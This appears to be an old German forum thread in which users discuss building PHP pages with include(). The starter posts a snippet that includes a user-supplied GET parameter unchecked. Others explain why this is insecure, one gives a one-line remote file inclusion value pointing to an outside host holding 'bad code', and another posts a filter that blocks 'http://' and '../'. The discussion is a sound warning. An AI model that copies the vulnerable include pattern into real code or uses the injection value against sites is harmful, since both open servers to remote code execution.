Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 19

Thema: PHP Include

  1. #1
    Meister(in)
    Registriert seit
    14.08.2003
    Beiträge
    412
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard PHP Include

    Hi

    Möchte eine Seite kreieren aber da mein alter PC hinüber ist, hab ich mein Tutorial zum Thema PHP Include nicht mehr zur Hand. Vielleicht könnt ihr mir auf die Sprünge helfen. Ich möchte eine Seite machen ohne Frames, halt mit Include. Nun finde ich im Net nur das falsche Zeug. Es ist ja so dass man die Seite praktisch in 3 Teile aufteilt: Header, Inhalt und Footer. Und mit den Links kann man die Inhalt-Seite definieren. So:

    Code:
    Home
    Dann öffnet sich die Main.php in der Index.php

    Das ist leider alles was ich noch weiss. Kann mir vielleicht jemand dieses PHP-Incude posten, bzw. mir weiterhelfen?
    Achtung: Dies ist ein alter Thread im HTML und Webmaster Forum
    Diese Diskussion ist älter als 90 Tage. Die darin enthaltenen Informationen sind möglicherweise nicht mehr aktuell. Erstelle bitte zu deiner Frage ein neues Thema im Forum !!!!!

  2. #2
    der/die Göttliche Avatar von jojo87
    Registriert seit
    23.03.2007
    Ort
    Leipzig
    Alter
    30
    Beiträge
    3.131
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    1.Forensuche, hattmer schon tausendmal

    2.
    Code:
    <?
    if&#40;isset&#40;$_GET&#91;'seite'&#93;&#41;&#41; &#123;
    	if&#40;strpos&#40;$_GET&#91;'seite'&#93;, "http&#58;//"&#41; !== FALSE || strpos&#40;$_GET&#91;'seite'&#93;, "../"&#41; !== FALSE&#41; &#123;
    		die&#40;"Die Seite existiert nicht"&#41;;
    	&#125;
    	else &#123;
    		if&#40;file_exists&#40;"./inc/".$_GET&#91;'seite'&#93;.".php"&#41;&#41; &#123;
    			include"./inc/".$_GET&#91;'seite'&#93;.".php";
    		&#125;
    		else &#123;
    			include"./inc/Startseite.php";
    		&#125;
    	&#125;
    &#125;
    else &#123;
    	include"./inc/Startseite.php";
    &#125;
    
    ?>
    Gute Nacht,
    Jojo

  3. #3
    Forum Guru Avatar von driver
    Registriert seit
    10.04.2006
    Alter
    34
    Beiträge
    20.729
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    andere alternative wäre:

    Code:
    <?php
       $section = isset&#40;$_GET&#91;'section'&#93;&#41; ? $_GET&#91;'section'&#93; &#58; "index";
       
       switch &#40;$section&#41;
       &#123;
    		case "index"				&#58; include &#40;"index.php"&#41;;      				     break;
    		case "test"				 &#58; include &#40;"test.php"&#41;;					break;
        &#125;
    ?>
    hier musst halt jede seite nochmal angeben, während du bei jojo dein seitennamen
    schon übergibst und dann in den dateinamen einbindest...
    >> die icq-schreiberlinge bitte dies hier beachten



    1679 entdeckte Gottfried Wilhelm Leibniz das Binärsystem, bei einem Gespräch mit seiner Mutter: "Ja..., Nein..., Nein..., Nein..., Ja..., Ja..., Nein..."

  4. #4
    Meister(in)
    Themenstarter

    Registriert seit
    14.08.2003
    Beiträge
    412
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Danke. Habs nun anders gemacht:

    Link:

    Link1




    Inhalt:

    <?php
    $seite = $_GET['seite'];
    if (empty($seite)) { $seite = 'home'; }
    include( $seite.'.php');
    ?>

    Hat sich also erledigt, pls close.

  5. #5
    Kaiserliche Hoheit Avatar von No0ob
    Registriert seit
    02.01.2006
    Ort
    Nähe Frankfurt
    Beiträge
    1.500
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Das ist die unsicherste Variante, die du hättest wählen können

  6. #6
    Meister(in)
    Themenstarter

    Registriert seit
    14.08.2003
    Beiträge
    412
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Zitat Zitat von No0ob
    Das ist die unsicherste Variante, die du hättest wählen können
    Inwiefern denn?

    Muss sagen, kenn mich mit PHP nicht wirklich aus aber diese Methode klappt bisher ganz gut unter allen getesteten Browsern.

  7. #7
    Kaiserliche Hoheit Avatar von No0ob
    Registriert seit
    02.01.2006
    Ort
    Nähe Frankfurt
    Beiträge
    1.500
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Weil so jede Datei eingebunden werden kann, die im Parameter übergeben wird.

  8. #8
    Bandit
    Gast

    Standard

    Wenn dein Server includes per URL zulässt, dann kann man z.B. das per Url dranhängen:
    Code:
    site=http&#58;//www.blablabla.ru/ich_beinhalte_boesen_code
    Oder den Server ein bischen quälen:
    Code:
    site=index

  9. #9
    Meister(in)
    Themenstarter

    Registriert seit
    14.08.2003
    Beiträge
    412
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Ok danke, ich werde dann jojo's Variante nehmen.

    Gruss,
    Deku

    EDIT: Ich verstehe zwar immer noch nicht was an der anderen Variante unsicher sein soll?? Ich meine, WER soll den eine Datei includen können? Außer mir selbst kann das doch niemand sonst machen.

  10. #10
    der/die Göttliche Avatar von jojo87
    Registriert seit
    23.03.2007
    Ort
    Leipzig
    Alter
    30
    Beiträge
    3.131
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    aber natürlich kann das jeder, probiers doch einfach mal aus.
    Nimm deinen Code und rufe im Browser was auf in der Form:
    Ein schöner Timeout wird das, und das kann dann natürlich jeder User machen, der deine Seite besucht, denn der kann ja im Browser aufrufen, was er will.

    Gruß,
    Jojo

Ähnliche Themen

  1. include in include (mehrfach) - Hilfe!
    Von maciwa im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 1
    Letzter Beitrag: 30.03.2008, 14:04
  2. Include
    Von Gast im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 7
    Letzter Beitrag: 20.12.2007, 14:21
  3. Include
    Von Adlerr2000 im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 15
    Letzter Beitrag: 07.05.2006, 21:17
  4. INCLUDE
    Von slmaggot im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 5
    Letzter Beitrag: 17.04.2006, 14:04
  5. include
    Von M1ster-T im Forum HTML & CSS Forum
    Antworten: 2
    Letzter Beitrag: 19.10.2005, 18:40

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •